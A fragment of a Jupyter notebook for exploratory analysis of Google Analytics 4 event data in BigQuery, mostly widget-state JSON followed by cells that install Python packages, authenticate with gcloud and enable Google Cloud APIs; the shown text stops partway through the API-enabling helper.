null, + "description_width": "" + } + }, + "f0a889f2b51f464cab9f3308e3b63121": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "a26e9a47d91348d3b105772edeac5630": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "ea7a3a04cfb94fe98bd95a9f7966edce": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HBoxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HBoxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HBoxView", + "box_style": "", + "children": [ + "IPY_MODEL_2a58793d049444c6a53aca19c71defb6", + "IPY_MODEL_f6eb1f0d931747b481c36ddfbe2a5573", + "IPY_MODEL_b81f9444bef847b88c08ac0680f8f658" + ], + "layout": "IPY_MODEL_5bfbecef183049f59f51d6e7da14e834" + } + }, + "2a58793d049444c6a53aca19c71defb6": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HTMLModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HTMLModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HTMLView", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_311de98c10b74ea2b1ed6eed85cdafda", + "placeholder": "​", + "style": "IPY_MODEL_ce5fbdac783f41689d7974ce121ac2cd", + "value": "Render HTML: 100%" + } + }, + "f6eb1f0d931747b481c36ddfbe2a5573": { + "model_module": "@jupyter-widgets/controls", + "model_name": "FloatProgressModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "FloatProgressModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "ProgressView", + "bar_style": "success", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_e51720ac245a45c1bd56134aef6a2a89", + "max": 1, + "min": 0, + "orientation": "horizontal", + "style": "IPY_MODEL_536ff1057f0e44d9985e76d3c320c7fd", + "value": 1 + } + }, + "b81f9444bef847b88c08ac0680f8f658": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HTMLModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HTMLModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HTMLView", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_9d9c41199f094121b70eb561b2243654", + "placeholder": "​", + "style": "IPY_MODEL_7b7b0397219a4ce98149f88c274ae6fa", + "value": " 1/1 [00:03<00:00,  3.27s/it]" + } + }, + "5bfbecef183049f59f51d6e7da14e834": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "311de98c10b74ea2b1ed6eed85cdafda": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "ce5fbdac783f41689d7974ce121ac2cd": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "e51720ac245a45c1bd56134aef6a2a89": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "536ff1057f0e44d9985e76d3c320c7fd": { + "model_module": "@jupyter-widgets/controls", + "model_name": "ProgressStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "ProgressStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "bar_color": null, + "description_width": "" + } + }, + "9d9c41199f094121b70eb561b2243654": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "7b7b0397219a4ce98149f88c274ae6fa": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "2b9bd5bb500642288f0503b10f0814d6": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HBoxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HBoxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HBoxView", + "box_style": "", + "children": [ + "IPY_MODEL_482f143bc653446780d5306130c213ab", + "IPY_MODEL_80e7a46044d94f31a151a2a9c2b9820f", + "IPY_MODEL_475a36c2e5c44b40987b6352c400706c" + ], + "layout": "IPY_MODEL_19aed523b1514eb69cd9c1fe84f64469" + } + }, + "482f143bc653446780d5306130c213ab": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HTMLModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HTMLModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HTMLView", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_aa913f5069c84d689fe80109f8fd39d7", + "placeholder": "​", + "style": "IPY_MODEL_85d79e9483714568a13d0215acc0d4c9", + "value": "Export report to file: 100%" + } + }, + "80e7a46044d94f31a151a2a9c2b9820f": { + "model_module": "@jupyter-widgets/controls", + "model_name": "FloatProgressModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "FloatProgressModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "ProgressView", + "bar_style": "success", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_f3216918c66b46aaaa7af39dfb4185e9", + "max": 1, + "min": 0, + "orientation": "horizontal", + "style": "IPY_MODEL_51e51aa2d6cc4e7bbcfd3ea3e293fd1a", + "value": 1 + } + }, + "475a36c2e5c44b40987b6352c400706c": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HTMLModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HTMLModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HTMLView", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_5a6a033f4a5b4827a3e58b0b5d4413b1", + "placeholder": "​", + "style": "IPY_MODEL_9090416b0b974821ad5fef43b11e5dc9", + "value": " 1/1 [00:00<00:00, 25.51it/s]" + } + }, + "19aed523b1514eb69cd9c1fe84f64469": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "aa913f5069c84d689fe80109f8fd39d7": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "85d79e9483714568a13d0215acc0d4c9": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "f3216918c66b46aaaa7af39dfb4185e9": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "51e51aa2d6cc4e7bbcfd3ea3e293fd1a": { + "model_module": "@jupyter-widgets/controls", + "model_name": "ProgressStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "ProgressStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "bar_color": null, + "description_width": "" + } + }, + "5a6a033f4a5b4827a3e58b0b5d4413b1": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "9090416b0b974821ad5fef43b11e5dc9": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "af6f4809165243a0954794c1a5aa27c5": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HTMLModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HTMLModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HTMLView", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_e53e43bbf7664c52a8596aa2904aa028", + "placeholder": "​", + "style": "IPY_MODEL_5f5fd2294c99427c8705a42d25fecdd7", + "value": "\n\n\n \n \n\n\n
\n \n \n \n
\n \n\n\n" + } + }, + "e53e43bbf7664c52a8596aa2904aa028": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "5f5fd2294c99427c8705a42d25fecdd7": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "8984f440582d47f3906577d85cea75be": { + "model_module": "@jupyter-widgets/controls", + "model_name": "ButtonModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "ButtonModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "ButtonView", + "button_style": "", + "description": "Display Analysis", + "disabled": false, + "icon": "", + "layout": "IPY_MODEL_eeff31568fbf45128403f36d4bc4ef52", + "style": "IPY_MODEL_798f3dabcdbc4b5d8a158865c4d57ec6", + "tooltip": "" + } + }, + "eeff31568fbf45128403f36d4bc4ef52": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "798f3dabcdbc4b5d8a158865c4d57ec6": { + "model_module": "@jupyter-widgets/controls", + "model_name": "ButtonStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "ButtonStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "button_color": null, + "font_weight": "" + } + } + } + } + }, + "cells": [ + { + "cell_type": "code", + "source": [ + "# Copyright 2025 Google LLC\n", + "#\n", + "# Licensed under the Apache License, Version 2.0 (the \"License\");\n", + "# you may not use this file except in compliance with the License.\n", + "# You may obtain a copy of the License at\n", + "#\n", + "# https://www.apache.org/licenses/LICENSE-2.0\n", + "#\n", + "# Unless required by applicable law or agreed to in writing, software\n", + "# distributed under the License is distributed on an \"AS IS\" BASIS,\n", + "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n", + "# See the License for the specific language governing permissions and\n", + "# limitations under the License." + ], + "metadata": { + "id": "YMdNqXlGhlGe" + }, + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "markdown", + "source": [ + "# Marketing Analytics Jumpstart - Recommended Events Analysis\n", + "\n", + "\n", + " \n", + " \n", + " \n", + " \n", + "
\n", + " \n", + " \"Google
Run in Colab\n", + "
\n", + "
\n", + " \n", + " \"Google
Run in Colab Enterprise\n", + "
\n", + "
\n", + " \n", + " \"GitHub
View on GitHub\n", + "
\n", + "
\n", + " \n", + " \"Vertex
Open in Vertex AI Workbench\n", + "
\n", + "
" + ], + "metadata": { + "id": "QxuNPr8chwSd" + } + }, + { + "cell_type": "markdown", + "source": [ + "* Author: Federico Patota - fpatota@google.com\n", + "\n", + "* Latest revision: January 24, 2025" + ], + "metadata": { + "id": "D1vh1W0Jnw2I" + } + }, + { + "cell_type": "markdown", + "source": [ + "\n", + "### Description\n", + "This notebook is used to perform an exploratory data analysis (EDA) and generate a data profiling report for Google Analytics 4 (GA4) data stored in BigQuery.\n", + "\n", + "The goal is to support the marketing team in selecting a short list of events to use for building a lead score propensity model.\n", + "\n", + "This notebook also leverages Vertex AI and Gemini to generate an initial recommendation based on the output of the Events Analysis.\n", + "\n", + "### Requirements\n", + "- You have a Google Cloud project with BigQuery and Vertex AI APIs enabled.\n", + "- You have exported GA4 data to BigQuery using the [integrated connector](https://support.google.com/analytics/answer/9358801?hl=en)\n", + "- You have the necessary permissions to access the data and run queries in BigQuery.\n", + "- You have already identified a *target event* that you want to use in the propensity model.\n", + "- You have good knowledge of data analysis concepts.\n", + "\n", + "Estimated Analysis time is around **30-40 minutes**." + ], + "metadata": { + "id": "5dnkb4D_XDzD" + } + }, + { + "cell_type": "code", + "source": [ + "# @title Step 1 – Installing the required Python packages\n", + "# @markdown Click the ( β–Ά ) button to ensure that the required packages are installed:\n", + "# @markdown * [google-cloud-bigquery](https://pypi.org/project/google-cloud-bigquery/)\n", + "# @markdown * [vertexai](https://pypi.org/project/vertexai/)\n", + "# @markdown * [pandas](https://pypi.org/project/pandas/)\n", + "# @markdown * [numpy](https://pypi.org/project/numpy/)\n", + "# @markdown * [scipy](https://pypi.org/project/scipy/)\n", + "# @markdown * [ydata-profiling](https://pypi.org/project/ydata-profiling/)\n", + "# @markdown * [ipywidgets](https://pypi.org/project/ipywidgets/)\n", + "\n", + "# The following libraries should come pre-installed when using Colab or Jupyter\n", + "# They will also be reimported in the next cell in case some packages are\n", + "# installed and the environment needs to be restarted\n", + "\n", + "# Standard library\n", + "import sys\n", + "import importlib\n", + "import time\n", + "\n", + "# IPython\n", + "from IPython.display import display, Markdown, clear_output\n", + "from IPython import Application\n", + "\n", + "def install_packages(package_name_list):\n", + " \"\"\"\n", + " Installs the specified packages.\n", + "\n", + " Args:\n", + " package_name_list: A list of package names to be installed.\n", + "\n", + " Returns:\n", + " True if the package was installed, False otherwise.\n", + " \"\"\"\n", + " added_packages = False\n", + " already_installed_list = !pip list\n", + " already_installed = \" \".join(already_installed_list)\n", + " for package_name in package_name_list:\n", + " if package_name in already_installed:\n", + " print(f\"Package {package_name} already present\")\n", + " else:\n", + " print(f\"Installing {package_name}\")\n", + " !pip install {package_name} --quiet\n", + " print(\"Package installed\")\n", + " added_packages = True\n", + " clear_output(wait=True)\n", + " return added_packages\n", + "\n", + "packages = [\"google-cloud-bigquery\",\n", + " \"vertexai\",\n", + " \"pandas\",\n", + " \"numpy\",\n", + " \"scipy\",\n", + " \"ydata-profiling\",\n", + " \"ipywidgets\"]\n", + "\n", + "added_packages = install_packages(packages)\n", + "\n", + "# Clearing the display after the install\n", + "clear_output(wait=True)\n", + "\n", + "if added_packages:\n", + " output = \"\"\"### Packages have been installed. Restarting runtime.\n", + " ### Please wait a few seconds and then proceed to the next step.\"\"\"\n", + " display(Markdown(output))\n", + " Application.instance().kernel.do_shutdown(True)\n", + "else:\n", + " output = \"### All packages are ready for use. You can proceed to the next step.\"\n", + " display(Markdown(output))" + ], + "metadata": { + "id": "KROlY0OtgZsm", + "colab": { + "base_uri": "https://localhost:8080/", + "height": 58 + }, + "outputId": "98372924-212d-493a-da9d-a534dfbd7d6c", + "cellView": "form" + }, + "execution_count": 4, + "outputs": [ + { + "output_type": "display_data", + "data": { + "text/plain": [ + "" + ], + "text/markdown": "### All packages are ready for use. You can proceed to the next step." + }, + "metadata": {} + } + ] + }, + { + "cell_type": "code", + "source": [ + "# @title Step 2 - Settings, Imports, and Authentication\n", + "\n", + "# @markdown To run the notebook, the following APIs will be enabled for the\n", + "# @markdown specified Google Cloud project:\n", + "# @markdown * [Vertex AI API](https://cloud.google.com/vertex-ai/docs/reference/rest)\n", + "# @markdown * [BigQuery API](https://cloud.google.com/bigquery/docs/reference/rest)\n", + "\n", + "# @markdown Fill the information below and then click the ( β–Ά ) button to update\n", + "# @markdown the settings and authenticate you to Google Cloud.\n", + "\n", + "# @markdown ---\n", + "# @markdown #### Google Cloud Platform (GCP)\n", + "# @markdown Copy the project ID from the \"Project Info\" card in the console [Dashboard](https://console.cloud.google.com/home/dashboard).\n", + "project_id = \"your-project-id\" #@param {type:\"string\"}\n", + "# @markdown Insert the location to use for Vertex AI. You can find\n", + "# @markdown [here](https://cloud.google.com/vertex-ai/generative-ai/docs/learn/locations#genai-locations)\n", + "# @markdown a list of all possible locations. If a valid location\n", + "# @markdown is not specified, `us-central1` will be used.\n", + "vertex_ai_location = \"us-central1\" #@param {type:\"string\"}\n", + "# @markdown ---\n", + "# @markdown #### Google Analytics 4 (GA4)\n", + "# @markdown For a quick installation, copy the GA4 property ID.\n", + "# @markdown You will find it in your GA4 console, under Admin settings.\n", + "ga4_property_id = \"123456789\" #@param {type:\"string\"}\n", + "# @markdown ---\n", + "\n", + "# Standard library\n", + "import sys\n", + "import importlib\n", + "import time\n", + "import datetime\n", + "import math\n", + "import base64\n", + "\n", + "# Google Cloud Platform\n", + "using_colab = \"google.colab\" in sys.modules\n", + "if using_colab:\n", + " from google.colab import auth, data_table\n", + "from google.cloud import bigquery\n", + "import vertexai\n", + "from vertexai.generative_models import GenerationConfig, GenerativeModel, Part\n", + "\n", + "# Third-party libraries\n", + "import numpy as np\n", + "import pandas as pd\n", + "import ipywidgets as widgets\n", + "from scipy.stats import chi2_contingency, f_oneway, kruskal\n", + "from ydata_profiling import ProfileReport\n", + "from IPython import Application\n", + "from IPython.display import display, clear_output, Markdown\n", + "\n", + "\n", + "def authenticate_notebook():\n", + " \"\"\"\n", + " Authenticates the Google Colab environment.\n", + " \"\"\"\n", + " global using_colab\n", + " if using_colab:\n", + " print(\"Authenticating the Colab Notebook environment.\")\n", + " auth.authenticate_user()\n", + " print(\"Enabling the Colab dataframe formatter.\")\n", + " data_table.enable_dataframe_formatter()\n", + " else:\n", + " # If not in a Colab, authenticating using gcloud cli\n", + " !gcloud auth login\n", + "\n", + "def set_project_id(project_id):\n", + " \"\"\"\n", + " Sets the Google Cloud project ID.\n", + " \"\"\"\n", + " !gcloud config set project {project_id}\n", + "\n", + "def enable_api(api_name):\n", + " \"\"\"\n", + " Enables a Google Cloud API.\n", + " \"\"\"\n", + " api_enabled = !gcloud services list | grep {api_name}\n", + " if not api_enabled:\n", + " print(f\"Enabling {api_name} API\", end=\"\")\n", + " !gcloud services enable {api_name}\n", + " print(\" - 